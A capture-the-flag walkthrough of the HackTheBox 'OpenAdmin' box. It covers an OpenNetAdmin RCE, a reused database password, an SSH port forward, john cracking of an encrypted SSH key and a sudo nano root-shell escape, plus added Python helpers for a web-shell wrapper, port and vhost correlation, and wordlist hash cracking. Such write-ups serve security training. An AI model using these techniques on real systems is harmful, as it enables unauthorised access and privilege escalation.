Let’s begin with an Nmap scan to enumerate listening ports and their services. We see that there are two ports open.
- 22: OpenSSH 7.6p1
- 80: Apache httpd 2.4.29
Enumeration – HTTP
Browsing to index.html shows the default Apache landing page, so we run a Gobuster scan to find other pages and directories. The first hit is /music, which contains some music samples. Interestingly, clicking Login redirects us to /ona. The /ona page is running OpenNetAdmin (ONA) version 18.1.1, and the DNS domain is openadmin.htb. Exploit-DB has a remote code execution exploit for this OpenNetAdmin version (EDB-ID 47691).
Getting the initial shell
We do not have a full shell yet; the exploit is essentially a glorified web shell. I noticed this because if we attempt to change directory, we are always brought back to the initial working directory: every command is sent in its own HTTP request and executed by a fresh process on the server, so a cd has nothing to persist into. The web shell is still enough to enumerate files, and in one of the application's configuration files we find a credential that might also work for SSH:
db_passwd -> n1nj4W4rri0R!
The database password had been reused for a local account: it allowed us to log in over SSH as the jimmy user.
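The cwd problem described above is inherent to any one-request-per-command channel: the exploit script sends each command in a fresh HTTP request, the server runs it in a new process, and that process exits, so cd has nothing to persist into. The usual fix is to track the directory on the client side and prefix every command with cd into it. The Python below is an added example, not part of this write-up or of the Exploit-DB script; it demonstrates the wrapper against a local sh -c transport, which has exactly the same statelessness as the web shell. The transport callable is a placeholder for whatever sends the real request, and the temporary directory it changes into is created by the demo itself.

```python
import os
import shlex
import shutil
import subprocess
import tempfile


class StatelessShell:
    """Emulates a persistent working directory over a channel that runs
    every command in a fresh process (e.g. a one-request-per-command
    web shell). `transport` is any callable that takes a shell command
    string and returns its stdout as a string."""

    def __init__(self, transport):
        self._transport = transport
        self.cwd = None  # None: use whatever directory the remote side starts in

    def run(self, command):
        # Prefix the command with a cd into the tracked directory so the
        # fresh process starts where the previous one "left off".
        if self.cwd is not None:
            command = f"cd {shlex.quote(self.cwd)} && {command}"
        return self._transport(command)

    def cd(self, path):
        # Resolve the target on the remote side (so relative paths and
        # symlinks behave like a real shell) and only commit it on success.
        resolved = self.run(f"cd {shlex.quote(path)} && pwd -P").strip()
        if not resolved:
            raise FileNotFoundError(f"cannot cd to {path!r}")
        self.cwd = resolved
        return resolved


def local_transport(command):
    """Stand-in for the real request sender: runs `command` in a new sh,
    exactly one process per call, and returns its stdout."""
    result = subprocess.run(["sh", "-c", command], capture_output=True, text=True)
    return result.stdout


def demonstrate():
    """Contrast the naive channel with the wrapped one, using a freshly
    created temporary directory as the target (constructed for the demo)."""
    target = os.path.realpath(tempfile.mkdtemp())
    try:
        # Naive use: the cd happens in one process, the pwd in another.
        local_transport(f"cd {shlex.quote(target)}")
        naive_pwd = local_transport("pwd -P").strip()

        # Wrapped use: the tracked cwd is re-applied on every call.
        shell = StatelessShell(local_transport)
        shell.cd(target)
        wrapped_pwd = shell.run("pwd -P").strip()

        # A failed cd must not silently move the tracked directory.
        try:
            shell.cd(os.path.join(target, "does-not-exist"))
            missing_rejected = False
        except FileNotFoundError:
            missing_rejected = True

        parent = shell.cd("..")
    finally:
        shutil.rmtree(target)

    return {
        "target": target,
        "naive_pwd": naive_pwd,
        "wrapped_pwd": wrapped_pwd,
        "naive_persisted": naive_pwd == target,
        "wrapped_matches_target": wrapped_pwd == target,
        "missing_dir_rejected": missing_rejected,
        "dotdot_matches_parent": parent == os.path.dirname(target),
    }


if __name__ == "__main__":
    print(demonstrate())
```

The same trick applies to environment variables and anything else a real shell would carry between commands: keep the state locally and replay it in the prefix. If the channel returns nothing on error (as most web shells do), resolving the directory with pwd -P before committing it is what keeps a typo from silently leaving you where you were.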
Pivot to second user
We must pivot to the second user (Joanna) to get the user.txt flag. I like to check what other services the host is listening for on localhost only, since those never show up in an external port scan. Using netstat -antup we see an interesting port, 52846, bound to 127.0.0.1; however, we do not have the rights to see which process is bound to it (netstat's -p only reports the owning PID for our own processes unless we are root). I wondered whether this could be a second web server, so I looked in /etc/apache2/sites-enabled, where two site configurations are enabled, one of them internal.conf. Bingo. internal.conf confirms that a second Apache site is listening on localhost only, with its own DocumentRoot on disk.
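The two checks above, listing loopback-only listeners and matching each port to an enabled Apache site, are worth scripting so they get done on every host. The Python below is an added example and not from this write-up; the netstat -antup output and the two site files it parses are constructed samples shaped like the real ones (the host names and document roots in them are placeholders), and in practice you would feed it the real command output and the contents of /etc/apache2/sites-enabled/*.conf.

```python
import re

# Constructed sample of `netstat -antup` output (not captured from the box).
# Without root, the PID/Program column shows "-" for other users' processes.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      -
tcp        0      0 10.0.0.5:22             10.0.0.9:51234          ESTABLISHED -
tcp6       0      0 :::80                   :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
"""

# Constructed site files shaped like Apache's sites-enabled/*.conf (placeholder names).
SAMPLE_INTERNAL_CONF = """\
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.example.htb
    DocumentRoot /var/www/example-internal
    <Directory /var/www/example-internal>
        Require all granted
    </Directory>
</VirtualHost>
"""

SAMPLE_DEFAULT_CONF = """\
<VirtualHost *:80>
    ServerName example.htb
    DocumentRoot /var/www/html
</VirtualHost>
"""

# TCP sockets in LISTEN state only; UDP lines have no state column and are skipped.
LISTEN_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+)\s+\S+\s+LISTEN\s+(\S+)")
VHOST_RE = re.compile(r"<VirtualHost\s+([^>]+)>(.*?)</VirtualHost>", re.S)


def split_hostport(addr):
    """'127.0.0.1:52846' -> ('127.0.0.1', 52846); ':::80' -> ('::', 80); '*:80' -> ('*', 80)."""
    host, _, port = addr.rpartition(":")
    return host, int(port)


def is_loopback(host):
    return host == "::1" or host.startswith("127.")


def loopback_listeners(netstat_text):
    """Return the TCP listeners bound only to a loopback address, i.e. the
    services an external Nmap scan could never have shown."""
    found = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if not m:
            continue
        proto, local, program = m.groups()
        host, port = split_hostport(local)
        if is_loopback(host):
            found.append({"proto": proto, "host": host, "port": port, "program": program})
    return found


def directive(body, name):
    """First value of an Apache directive inside a <VirtualHost> body, or None."""
    m = re.search(rf"^\s*{name}\s+(\S+)", body, re.M)
    return m.group(1) if m else None


def vhosts(config_text):
    """Map each port a <VirtualHost> block binds to its bind address,
    ServerName and DocumentRoot."""
    result = {}
    for m in VHOST_RE.finditer(config_text):
        addrs, body = m.groups()
        for addr in addrs.split():  # a block may list several addr:port pairs
            host, port = split_hostport(addr)
            result[port] = {
                "bind": host,
                "server_name": directive(body, "ServerName"),
                "document_root": directive(body, "DocumentRoot"),
            }
    return result


def correlate(netstat_text, *config_texts):
    """Join loopback listeners with the vhost (if any) that serves each port."""
    known = {}
    for text in config_texts:
        known.update(vhosts(text))
    report = []
    for listener in loopback_listeners(netstat_text):
        entry = dict(listener)
        entry["vhost"] = known.get(listener["port"])  # None: not an Apache site
        report.append(entry)
    return report


if __name__ == "__main__":
    for entry in correlate(SAMPLE_NETSTAT, SAMPLE_INTERNAL_CONF, SAMPLE_DEFAULT_CONF):
        print(entry)
```

A loopback listener with no matching vhost is just as interesting: it is some other daemon (a database, a management agent) that you would go and identify through /proc, ss -ltnp, or the process list once you have enough rights.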
Reviewing that site's source, it seems that once we log in to the application it hands us Joanna's private SSH key (id_rsa), which could allow us to pivot to her user.
I started an SSH session with a local port forward so that the internal web server is reachable from my own machine on the same port:
$ ssh -L 52846:localhost:52846 jimmy@openadmin.htb
After navigating to the page, it seems that a login is required. However, a code review shows that the password hash is hard-coded in the login form's source. There are two routes here: Jimmy has permission to edit the file, so we could remove the password check altogether, or we could crack the hash. I opted to try Googling the hash first; perhaps someone had already cracked it. Besides, perhaps it was an unintended misconfiguration that Jimmy was allowed to edit the files, and leaning on it would mean modifying the application. And we are in luck: a search turned up the plaintext password.
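Cracking the hash yourself, the alternative to looking it up, is a wordlist loop: hash each candidate with the same algorithm and compare. The Python below is an added example, not code from this write-up or from the target application. It guesses the algorithm from the digest length (the write-up does not say which hash the form used, so that is an assumption you would verify against the source), applies a few cheap mangling rules of the kind john and hashcat rule files automate, and runs against a small constructed wordlist instead of rockyou.txt.

```python
import hashlib

# Unsalted hex digests are recognisable by length alone; anything else
# (salted hashes, $6$ crypt strings, bcrypt) needs john/hashcat, not this loop.
DIGEST_ALGORITHMS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def guess_algorithm(digest_hex):
    return DIGEST_ALGORITHMS.get(len(digest_hex))


def mangle(word):
    """Yield the word plus a few common variants (capitalised, trailing
    '!', '1', '123'). Real rule sets are far larger; this shows the idea."""
    for base in (word, word.capitalize()):
        for suffix in ("", "!", "1", "123"):
            yield base + suffix


def crack_digest(digest_hex, wordlist, algorithm=None):
    """Return the plaintext whose digest matches, or None when exhausted.
    `wordlist` is any iterable of lines, e.g. open('rockyou.txt', errors='ignore')."""
    digest_hex = digest_hex.strip().lower()
    algorithm = algorithm or guess_algorithm(digest_hex)
    if algorithm is None:
        raise ValueError(f"cannot infer algorithm from a {len(digest_hex)}-char digest")
    for line in wordlist:
        for candidate in mangle(line.rstrip("\r\n")):
            if hashlib.new(algorithm, candidate.encode()).hexdigest() == digest_hex:
                return candidate
    return None


# Constructed sample: a tiny wordlist and a SHA-512 of one mangled entry.
SAMPLE_WORDLIST = ["password", "letmein", "hedgehog", "dragon"]
SAMPLE_DIGEST = hashlib.sha512(b"Hedgehog!").hexdigest()
SAMPLE_MISS = hashlib.sha512(b"not-in-the-list").hexdigest()


if __name__ == "__main__":
    print(crack_digest(SAMPLE_DIGEST, SAMPLE_WORDLIST))  # Hedgehog!
    print(crack_digest(SAMPLE_MISS, SAMPLE_WORDLIST))    # None
```

Open rockyou.txt with errors='ignore': it contains lines that are not valid UTF-8 and a plain open() will abort partway through. A hash that resists the wordlist plus cheap rules is the point at which to hand over to hashcat, which does the same thing on a GPU with far better rule sets.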
Bingo, after logging in we get the id_rsa key as expected.
Of course the key is encrypted, so we convert it to john's format with ssh2john and use john to crack the passphrase with rockyou.txt.
$ ssh2john.py id_rsa > crack_me.rsa
$ john --wordlist=/usr/share/wordlists/rockyou.txt crack_me.rsa
bloodninjas
Bingo, the passphrase for the encrypted id_rsa is bloodninjas. (Remember to chmod 600 the key file before using it with ssh -i, or ssh will refuse to load it.)
Escalate to root user
We need to perform some user enumeration, starting with sudo -l. We see that Joanna is allowed to edit /opt/priv as the root user without a password, using nano. Thankfully, GTFOBins has us covered, and we can escape nano to get a shell with the ^R ^X sequence: from nano's Read File prompt, ^X opens the Execute Command prompt, and whatever we type there runs with nano's root privileges. The reset restores the terminal after nano has put it into raw mode, and the redirections attach the new shell's stdout and stderr to the terminal.
My friend has done a demo of this on YouTube.
$ sudo -l
User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
$ sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0